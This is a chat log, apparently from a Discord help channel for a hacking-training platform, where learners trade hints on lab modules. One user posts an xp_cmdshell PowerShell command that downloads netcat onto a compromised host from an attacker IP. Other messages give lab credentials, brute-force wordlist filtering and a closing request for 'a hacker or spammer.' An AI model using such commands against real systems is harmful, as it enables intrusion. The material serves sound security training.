Can someone explain why my VPN doesn´t work. It has worked in the past but not anymore, + I don´t find any solutions in the FAQ or anywhere else

glad solar
#

did you uninstall kali or update it?

grave dust
#

can anyone help me on the skill assessment of Windows PE ?

lethal atlas
#

the error shows that your missing the cipher you have set

lethal atlas
#

@glad solar what password were you trying?

dusk sequoia
glad solar
devout bear
#

trying to find user SID in powershell. I am using correct CMnd getting nothing

#

im a noob...need some help

lethal atlas
glad solar
#

ill keep trying

lethal atlas
glad solar
#

oh i see it

glad solar
#

i did this

lethal atlas
#

can you ping the host?

#

I dont know if assigning the username before or after matters. I guess try and see

quiet prism
#

can someone help me with information gathering-web edition

lethal atlas
#

active subdomain enumeration I am betting

quiet prism
glad solar
#

you do bob:Welcome1

#

correct?

lethal atlas
#

yes sir

glad solar
#

then wtf is happening

lethal atlas
#

dm me and I will do a screen share

devout bear
#

Can anyone help me with the last chapter/module on windows funamentals?

slow ruin
#

Anyone available to give me a nudge with File Upload Attacks - Skill Assessment? I am able to read the source code and found where and how the files are uploaded but need a nudge on understanding MIME type or if I am using the correct MIME type

devout bear
acoustic owl
iron river
#

hi, can someone help me with broken authentication skills assessment?

#

i having difficulty with bruteforcing the admin account password

#

i think mainly its my wordlist, but i wasnt sure if i am filter it right. the following is the command i use to filter it

egrep '^.{20,30}$' rockyou.txt| grep '^[[:upper:]]'| grep '[[:digit:]]$'| grep '[]$#@{]'

vital adder
rustic sage
#

I'm a script kiddy as it is called

#

Where can I learn py

#

And c++

iron river
vital adder
iron river
#

@vital adder btw, is my command to filter the wordlist correct? i am kinda skeptical about it

vital adder
vital adder
iron river
#

hold up 😂

vital adder
iron river
#

19

acoustic owl
vital adder
iron river
lethal atlas
vital adder
vital adder
iron river
vital adder
iron river
#

will do~ thanks

twin stirrup
#

Having Troubles exploiting host 2 in the Shells and Payloads Live Engagement section. Would anyone have time to bounce some things off?

twin stirrup
vital adder
#

after you run that try search the exploit nummber or if you change the name to something else search for that name

twin stirrup
vital adder
twin stirrup
vital adder
vital adder
# twin stirrup

also if you set the targeturl and the vhost to the ip that's the issue

vital adder
# twin stirrup

yep you need to set the target url and the vhost to blog domain

twin stirrup
#

that was it as soon as i set the url in the vhost. thank you for your helpo

half cave
#

Can someone help me with setting up the VPN?

lethal atlas
lethal atlas
#

screen shot the error

half cave
#

There's no error

#

I simply can't ssh into the target

#

Timeout

lethal atlas
#

what do you see when you ip a

half cave
#
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 52:54:00:f3:e9:3a brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.238/24 brd 192.168.122.255 scope global dynamic noprefixroute enp1s0
       valid_lft 2423sec preferred_lft 2423sec
    inet6 fe80::1e80:af70:bbd4:105a/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
#

And with VPN enabled:

└──╼ $ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: enp1s0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 52:54:00:f3:e9:3a brd ff:ff:ff:ff:ff:ff
    inet 192.168.122.238/24 brd 192.168.122.255 scope global dynamic noprefixroute enp1s0
       valid_lft 2364sec preferred_lft 2364sec
    inet6 fe80::1e80:af70:bbd4:105a/64 scope link noprefixroute 
       valid_lft forever preferred_lft forever
4: tun0: <POINTOPOINT,MULTICAST,NOARP,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UNKNOWN group default qlen 500
    link/none 
    inet 10.10.15.186/23 scope global tun0
       valid_lft forever preferred_lft forever
    inet6 dead:beef:2::11b8/64 scope global 
       valid_lft forever preferred_lft forever
    inet6 fe80::a14e:6ada:e2cb:e0d6/64 scope link stable-privacy 
       valid_lft forever preferred_lft forever
lethal atlas
#

ok so vpn is connected. lets see you ssh command

half cave
#

Here's the result:

└──╼ $ssh htb-student@10.129.xxx.xxx
Connection closed by 10.129.xxx.xxx port 22
lethal atlas
#

are you sure ssh is open ? what module are you working on?

half cave
#

It says "SSH to xxx with user [...]"

lethal atlas
#

can you ping the target ip?

half cave
#

ehhh the command goes on and on

#
└──╼ $ping 10.129.29.112
PING 10.129.29.112 (10.129.29.112) 56(84) bytes of data.
64 bytes from 10.129.29.112: icmp_seq=1 ttl=63 time=29.4 ms
64 bytes from 10.129.29.112: icmp_seq=2 ttl=63 time=30.9 ms
64 bytes from 10.129.29.112: icmp_seq=3 ttl=63 time=28.7 ms
64 bytes from 10.129.29.112: icmp_seq=4 ttl=63 time=31.6 ms
64 bytes from 10.129.29.112: icmp_seq=5 ttl=63 time=28.9 ms
64 bytes from 10.129.29.112: icmp_seq=6 ttl=63 time=32.2 ms
64 bytes from 10.129.29.112: icmp_seq=7 ttl=63 time=30.5 ms
64 bytes from 10.129.29.112: icmp_seq=8 ttl=63 time=31.4 ms
64 bytes from 10.129.29.112: icmp_seq=9 ttl=63 time=28.2 ms
64 bytes from 10.129.29.112: icmp_seq=10 ttl=63 time=29.3 ms
64 bytes from 10.129.29.112: icmp_seq=11 ttl=63 time=28.9 ms
64 bytes from 10.129.29.112: icmp_seq=12 ttl=63 time=30.8 ms
64 bytes from 10.129.29.112: icmp_seq=13 ttl=63 time=35.3 ms
64 bytes from 10.129.29.112: icmp_seq=14 ttl=63 time=35.9 ms
64 bytes from 10.129.29.112: icmp_seq=15 ttl=63 time=29.6 ms
64 bytes from 10.129.29.112: icmp_seq=16 ttl=63 time=29.5 ms
64 bytes from 10.129.29.112: icmp_seq=17 ttl=63 time=32.9 ms
64 bytes from 10.129.29.112: icmp_seq=18 ttl=63 time=29.0 ms
64 bytes from 10.129.29.112: icmp_seq=19 ttl=63 time=29.3 ms
#

this is not the whole output

lethal atlas
#

thats fine it wont end till you end it

half cave
#

oh okay lol xD

#
--- 10.129.29.112 ping statistics ---
143 packets transmitted, 143 received, 0% packet loss, time 142201ms
rtt min/avg/max/mdev = 27.540/31.563/88.248/5.243 ms
lethal atlas
#

ok so ssh htb-student@10.129.29.112 works for me

half cave
#

hmmmm...

#

strange

#

I have a VPN on my host machine, could this be the troublemaker?

lethal atlas
#

i dont see why, I use vpn from my VM

deep delta
#

i was wondering for fuzzing web aplications, how come that ffuf shows a file with a 200 status but when a try to get it via cat it returns html?

lethal atlas
lethal atlas
#

I would say maybe your command is not quite right

deep delta
#

oh ok

lethal atlas
#

feel free to dm and we can work on it

half cave
lethal atlas
half cave
#

ahh okay I'll later try to disable it

half cave
lethal atlas
#

@half cave but you can ping 10.129.29.112?

old cove
#

how do i write this payload to a .svg file

lethal atlas
#

i would use nano but vim or pico will also work. Or any text editor

half cave
# lethal atlas <@641667098505904129> but you can ping 10.129.29.112?

actually not 😮

PING 10.129.29.112 (10.129.29.112) 56(84) bytes of data.
From 10.10.14.1 icmp_seq=1 Destination Host Unreachable
From 10.10.14.1 icmp_seq=2 Destination Host Unreachable
From 10.10.14.1 icmp_seq=3 Destination Host Unreachable
From 10.10.14.1 icmp_seq=4 Destination Host Unreachable
From 10.10.14.1 icmp_seq=5 Destination Host Unreachable
cedar folio
#

im properly stuck on Broken Authentication assessment, can anyone give me a push pls?

half cave
lethal atlas
#

damn skills assessment on password attacks is brutal

robust prism
#

Hello, I am in the Getting Started module and in the Nibbles-Privilege Escalation section I get to the point of executing the monitor.sh file, but it is requiring me to input the nibbles user password when it says it shouldn't. Is there something I am overlooking?

#

Doesn't seem to be any forum discussions on it, so it has to be something I don't intuitively know after completing the rest of the module.

lethal atlas
#

once logged in as nibbles you should be able to sudo the file without a password

robust prism
#

yea, I ran it as nibbles, which is why I am lost. I'll get a screenshot.

#

with sudo

robust prism
#

Ok, I don't know what changed. I reset the target machine 3 times and did the same thing. Only thing that changed was the IP of the target machine on my final attempt and it worked. Just gonna let that one go.

lethal atlas
#

can anyone tell me if I am using the right wordlist for password attacks easy lab

acoustic owl
lethal atlas
acoustic owl
lethal atlas
#

ive been running the username.list provided against the mut list and found nothing yet

normal laurel
#

Hello,
I am having a bit of trouble with the Advanced File Disclosure section of the Web Attacks Module. Could someone assist me?
|| I feel like I should be editing the xxe.dtd file but I'm not quite sure how to...||

normal laurel
grave dust
normal laurel
#

kk

lyric jungle
#

Hi, so im doing the linux fundementals module rn, and im wondering, is it normal that i dont understand 80% of the things that is being explained?

shell raptor
lyric jungle
# grave dust what do u mean ?

Like im completely new to this, 0 cyber sec background, never touched upon linux before. And the module is just a bunch of words i dont rlly get.

lyric jungle
grave dust
#

take notes

#

and by using the commands again and again ur gonna find it easy to do

lyric jungle
#

Okay will do

#

Also is it fine if i follow the course without having linux installed?

#

I read abt vms and stuff so i want to have linux on there if possible

shell raptor
lyric jungle
#

So to get it straight, you wont be installing linux on ur own pc right?

shell raptor
# lyric jungle So to get it straight, you wont be installing linux on ur own pc right?

I have done a dual boot in past on a PC with Kali Linux and Windows, and I ended up breaking something in the bIOS settings and completed fudged it all up/haven't gotten it to work since (thank goodness it was crap computer haha). (dual boot is like not installing it on a VM but actually partitioning part of computer for it) But to answer your question: correct, it just installs the OS image onto a VM that you can easily turn on/delete/etc... Here is ParrotSec's instructions on installing it onto Oracle Virtual Box: https://www.parrotsec.org/docs/install-parrot-on-virtualbox.html

lyric jungle
shell raptor
austere wyvern
#

hi! im doing the using web proxies course and there is a part where you need to fuzz for an md5 encrypted cookie. Can someone point me in the right way because i can seem to figure it out :/

#

" The directory we found above sets the cookie to the md5 hash of the username, as we can see the md5 cookie in the request for the (guest) user. Visit '/skills/' to get a request with a cookie, then try to use ZAP Fuzzer to fuzz the cookie for different md5 hashed usernames to get the flag. Use the "top-usernames-shortlist.txt" wordlist from Seclists."

onyx dust
#

this is the longest i've done so far

#

the module that took the most time.

west canopy
#

congrats!

native quarry
#

Nice! How long did it take you?

onyx dust
#

since july 29

#

oh no my oldest file is july 25

#

even longer than that.

native quarry
# onyx dust even longer than that.

Not bad! What do you think was taking the most time for you? I'm slowly going through modules, but it feels like an eternity. Constantly taking screenshots, writing notes, etc.

onyx dust
#

i had stuff to do irl too but still, it's a long time.

#

well the only reason i did that active directory module like that is because i was trying to do the notes taking one

#

and it's like, take over the domain n finish the report

native quarry
#

Ah, gotcha. I'm a long way from getting to that one. Sounds interesting.

onyx dust
#

i dont really keep notes until the past 3 or 4 modules

#

and it's just a text file that looks like this but uglier because it's just text and no cool formatting like the forum post

#

that forum post is practice making them more concise (5 easy steps to solve it the way i approached and modeled it)

#

but had to do tunnel and pivot module too in order to write that, which is not what everyone else is doing on the forum thread.

#

if i did not take notes it would be uglier than that or not exist at all, idk.

vale salmon
#

Is anyone available to answer a quick question for me about using ZAP in the Web Proxies module?

rustic sage
lethal atlas
#

@west canopy you awake?

west canopy
#

hey

lethal atlas
#

On password attacks easy lab, I have gotten ssh access, but I cant find the path to get the root password. Lazagne errors out, I cant install anything, cant sudo, there is no mozilla, give me a hint bro..

west canopy
#

@lethal atlas try checking ||bash history :)||

radiant dagger
#

haha, I'm on this one right now. None of the techniques are working

west canopy
#

@radiant dagger ready to have your mind blown?

radiant dagger
leaden quail
#

hi guys, i stuck on the footprint modul Section IMAP: Question: Try to access the emails on the IMAP server and submit the flag as the answer. (Format: HTB{...})

#

i tried openssl and curl to fetch the email but nothing works, any hint?

feral stump
leaden quail
#

yes

coral sundial
#

Just going over the Linux Priv Esc Module - Special Permissions but I can't get the answer correct - I believe my searches work fine and provide the answer. Any help appreciated 🙂

knotty crag
#

guys if i login on hack the box webiste

#

webiste

#

website*

#

i would get kali linux gui to practice right

#

or i have to install it sperately

#

seperately

placid quest
#

@knotty crag hackthebox uses Parrot os not kali but you can use kali if you inatall it sperately

knotty crag
feral stump
coral sundial
knotty crag
#

ok its curl

coral sundial
#

From man: DESCRIPTION
curl is a tool for transferring data from or to a server. It supports these protocols: DICT, FILE, FTP,
FTPS, GOPHER, GOPHERS, HTTP, HTTPS, IMAP, IMAPS, LDAP, LDAPS, MQTT, POP3, POP3S, RTMP, RTMPS, RTSP, SCP,
SFTP, SMB, SMBS, SMTP, SMTPS, TELNET or TFTP. The command is designed to work without user interaction.

   curl  offers  a busload of useful tricks like proxy support, user authentication, FTP upload, HTTP post, SSL
   connections, cookies, file transfer resume and more. As you will see below, the number of features will make
   your head spin.
knotty crag
#

i have a doubt

#

as i dont actually have a good pc

#

i just wanted to know that is it necessary to have a 8gb ram to run my workstation on hack the box

#

as it provides a lab

#

and a workstation

coral sundial
worthy yoke
#

hi , i am stuck in Broken Authentication - Predictable Reset Token module at question 1 , as far as I know token is generated by hash of username and time then hash md5 , I tried converting datetime to epoch time but still getting got the wrong token

austere wyvern
coral sundial
austere wyvern
#

if yes, can u send me a pm

river hornet
#

Introduction to Bash Scripting/Conditional Execution
I feel like there is a whole bunch of information I'm suppose to be taught in this section prior to the question of "Create an "If-Else" condition in the "For"-Loop of the "Exercise Script" that prints you the number of characters of the 35th generated value of the variable "var". Submit the number as the answer.", as I have no idea where to begin, or what I'm looking at! Has anyone else get stuck here, and know what is going on, or what they are asking?

coral sundial
austere wyvern
quiet prism
#

anyone around to help me with active subdomain enumeration. this module is so desperately requiring a re-write update

lethal atlas
rustic sage
#

hey guys im stuck on "Firewall and IDS/IPS Evasion - Hard Lab can anyone help me please? thanks

drifting glacier
#

Could I get a mod or someone to take a look at the target instance for the "SeImpersonate and SeAssignPrimaryToken" section in the Windows Priv Esc module?

#

I've been unable to rdp into the target session with the credential provided: Authenticate to 10.129.43.43 with user "sql_dev" and password "Str0ng_P@ssw0rd!"

#

I've tried both "Str0ng_P@ssw0rd!" and "StrOng_P@sswOrd!", but the connection still fails

#

Able to connect to a different target instance like normal

quiet prism
mortal crystal
#

I have a question regards AD Skills Assessment Part II.
I got the xp_cmdshell access on database, now, the problem is downloading file to that machine, the current directory where i am C:\Windows\system32 does not have permissions to do anything, and i can't navigate or move from it to another dir. I tried with powershell downloading to specific folder, but that does not work either.

SQL> xp_cmdshell powershell.exe (New-Object Net.Webclient).Downloadfile('http://172.16.7.240:3333/nc64.exe', 'C:\Temp2\nc64.exe')
[-] ERROR(SQL01\SQLEXPRESS): Line 1: Incorrect syntax near '/'.

Any help is appreciated

errant lava
#

Im stuck on footprinting-imap/pop3 I tried to use this email as the admin email but it says it's wrong... any hints?

lethal atlas
#

@errant lava your command seems overly complicated.. simplify it up.

#

try openssl s_client -connect 10.129.123.78:imaps

errant lava
tepid fjord
#

guys

#

i wanna ask for help]

#

Local file inclusion section basic bypasses

#

i tried every combination to bypass filters

#

still getting illegal path specified

#

need help

lethal atlas
#

actually, no I got the same thing, that is just the first step

#

you then have to login

#

fetch the email and get the answer

errant lava
#

ahh okay, I'll try that

errant lava
old cove
#

i can get etc/passwd but am unable to get the flag what am i missing

errant lava
old cove
#

assesment file upload

vital adder
old cove
#

so find the upload path and all that s***

vital adder
tepid fjord
#

before that, still did not get to that

hollow pike
#

is there a way to use a find command to also list how many it found?

#

the manual is really big and im still looking for it with little success, thought rates could be used but dont know how to

vital adder
old cove
#

@vital adder thanks

tepid fjord
#

i will give it try

vital adder
hollow pike
tepid fjord
#

ok it still not working

#

the question: The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

#

i used ....// and encoding

#

still no use

tepid fjord
errant lava
#

Im stuck on footprinting-imap/pop3 still... I have tried connecting with telnet but I don't know the username and password. It is asking me to submit the admin email and the only email that shows up when I do openssl s_client -connect 10.129.14.128:imaps is not the one I need

vital adder
lethal atlas
#

(robin:robin)

errant lava
#

Yeah I saw that. I guess it doesn't work with telnet tho

#

I'm logged in now just trying to figure the commands out

old cove
#

i found the upload path and the source code but having trouble understanding how the files are renamed

vital adder
opal vapor
#

I am currently at the File Transfer module and I am stuck at the 2nd question where I need to upload a .zip file to the target machine. Do I need to provide a server on the target machine or my pwnbox ? Its properbly from my pwnbox, but I can't reach the pwnbox from the target machine, although I using the VPN. Can any one help ?

vital adder
opal vapor
#

@vital adder Sorry I meant with pwnbox my own computer and on them I use the VPN

vital adder
opal vapor
#

I am using academy.ovpn

vital adder
#

just use the pwnbox or just use your vpn

opal vapor
#

I am not using the pwnbox in the web UI. I only using the open vpn file.

vital adder
opal vapor
#

No

vital adder
opal vapor
#

Alright

lethal atlas
errant lava
opal vapor
#

@vital adder Is this the right command to download a file ? Invoke-WebRequest http://<target IP>/upload_win.zip -OutFile upload_win.zip. Anyway I have some problems connecting to my computer where I configured the python web server.

vital adder
opal vapor
#

Yes that's what I did, but if I try to access the file I want to upload to the target machine with the command I mention earlier, I get the error message, that I can't connect to my computer where I host the python web server.

twin stirrup
#

For the network services portion of the Password Attack module. Is the username list and the password list the one I should use to get the RDP username and password?

twin stirrup
#

K I was using and hydra keeps stopping saying something about to many errors. just wanted to make sure I was on the right track.

lethal atlas
twin stirrup
lethal atlas
twin stirrup
lethal atlas
#

Can anyone give me a nudge on what to do in Password Attacks Medium Lab after I get the login for J? I have ssh'ed into the machine and looked around but dont see anything useful. Do I need to try and view the database files found in pulse?

terse adder
#

Hi All, I'm in the OSINT: Corporate Recon module. I have answers for all the questions besides the "Locations". Has anyone done it already and can give me a hint?

vital adder
lethal atlas
#

but logged in with J so I guess I was high lol

robust prism
#

Anybody able to help me in DM with the last step of the Getting Started module Knowledge Check so I don't blow up this chat? I am able to get to the point of starting the reverse shell with escalated privileges, but I can't execute any commands in it

vital adder
final frigate
#

I need help at Pivoting, Tunneling, and Port Forwarding module, in the Skills Assesment. I got the second target and the IP I need to pivot now, but I can't find any credentials, neither reuse the used before

#

the module isn't about finding creds (they didn't teach anything about that), so I don't think I need to search for it

rustic sage
#

is someone a hacker in fortnite would play with one

vital adder
final frigate
#

haha don't worry, if you could help me

vital adder
final frigate
#

yep

#

I tried with the password from before or finding one, without success

vital adder
# final frigate yep

if you do it the right with ||mimikatz|| then the password should the at the bottom of the output

final frigate
#

lol, but they didn't even told you about that

vital adder
#

did you read the hint for question 5

final frigate
#

I checked the file but didn't find anything special

vital adder
final frigate
#

thanks mate :)

dire sentinel
#

On the Shells & Payloads - Skills assessment: Attempting to get a reverse shell on Host 1. Deployed payload, shown as running, but failing to get the connection on listener. Feel like I am overlooking something? Any help is appreciated 🙂

sinful zenith
#

would this be the right place to ask for help with an error im getting on a starting point module?

dire sentinel
onyx dust
old cove
radiant dagger
#

Windows Privilege Escalation the connection is completely broken. Couldn't connect to neither thru VPN or attack instance

radiant dagger
#

the issue has been remediated

half spindle
#

anyone else having issues with the server for Nibbles? Getting to a point of logging to the admin panel, and just locking up/not loading

heady hamlet
finite gorge
#

Heya guys. I am having a little bit of trouble in the Medium lab in Network Enumeration With Nmap Module. I am not sure if the answer is right in front of me or not to find out what is the DNS server version of the target. Feel free to DM me.

frank pulsar
finite gorge
#

Maybe...I don't know I am quite a noob here. I did a scan with -sV -sC and -p- which gave a lot of interesting information.

#

I was assuming that maybe the DNS server version would be something like Apache/2.4.18

#

But maybe I have been detected by IDS so I am not sure

finite gorge
finite gorge
acoustic owl
fresh wedge
#

What list did you use for ActiveDirectory skill assignment 2 question 4? Tried several list from SecList nothing is working. Could use a nudge

finite gorge
acoustic owl
finite gorge
heady hamlet
# acoustic owl In which section?

Both in the passive and active sections there are certain GO modules that are installed. I think I might have a problem with the bashrc file. I will check that out first

feral stump
#

@acoustic owl can I dm you pls?

radiant dagger
#

I hope that i could see this earlier. Found it after I solved it 😅

acoustic owl
calm nymph
#

me help

woven copper
lethal atlas
worthy yoke
#

thanks @hollow quest @lethal atlas let me try

fiery berry
#

Hi, I'm having problems with the module "attacking common services" there is no ftp service running on the target machine. I've reset the target three times and looks like didn't change much. I'm using -p- as argument for nmap. Anyone having the same problem?

errant lava
fiery berry
errant lava
#

have you used -sV and -sC?

fiery berry
vital adder
fiery berry
#

To clear any doubts this is the command I'm using: "sudo nmap -vv -n -sVC -p- <target_ip_address> -oA ftp"

fair cove
#

Hey there everyone. Is there someone here with Python/docker/aws experience for developing"? I have some questions I want to ask

lethal atlas
#

I am absolutely stuck on password attacks medium lab

vital adder
fierce pewter
#

Hi, a zone in DNS protocole and most particulary on Bind9 is a config file that contain all your DNS record. You can have one or more zones on your DNS server. A zone is characterized by a SOA (a zone can only have 1 SOA). So here, the goal is to identify which domain names (that you already find) respond to a SOA DNS query 😉

lethal atlas
vital adder
#

hint ||that ssh key isn't for the d user||

lethal atlas
vital adder
lethal atlas
#

LOL i just did. I did not know that would work for more than one person. That is crazy

#

I have been stuck there since yesterday

vital adder
lethal atlas
#

onto the hard lab!! thanks @vital adder

vital adder
feral stump
#

Hi!!
In the last question of DNS footprint regarding the host ending with 203 I’m trying every subdomain found with different wordlists

#

Can anyone help pls?

#

Trying different options but can’t manage to hit the pot

#

My command is:
||dnsenum —dns server HTB_ip —enum -p 0 -s 0 -o subdomain.txt f <seclists_wordlist> inlanefreight.htb||

acoustic owl
#

Why do you want to bruteforce the main domain? It allows a zone transfer. It gives you all the data voluntarily

alpine vault
#

@fierce pewter I really appreciate you taking the time to break that down for me it made it so much more clear!

twin stirrup
#

Could I get some help with the password mutations sestion of the password attacks module. I have tried cutting the mutated password list down but that still didnt seem to get it to brute force it using hydra.

vital adder
twin stirrup
#

O I used the last 17000 but I will try that.

onyx heron
#

Hello

#

someone could help me to connect htb to my vm

#

htb academy machine

#

''2022-08-11 12:27:16 Initialization Sequence Completed''

#

after that what should i do

lethal atlas
onyx heron
#

done

#

after that?

twin stirrup
vital adder
vale salmon
rustic sage
#

nice nice!

#

Did you do "Using Web Proxies", skill assessment? @vale salmon

fierce pewter
#

Hi, I'm stuck on "Information Gathering - Web Edition" module at the "Information Gathering - Web - Skills Assessment", question 3: "Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host?". I dont realy understand the question, I dont know what I am suppose to find. I ckecked on the DNS records, the header of the page, etc. Can anyone can help me?

fierce pewter
rustic sage
#

Do you mind that I pm you @vale salmon ?

vale salmon
errant lava
random palm
#

I need a hacker or spammer to work with...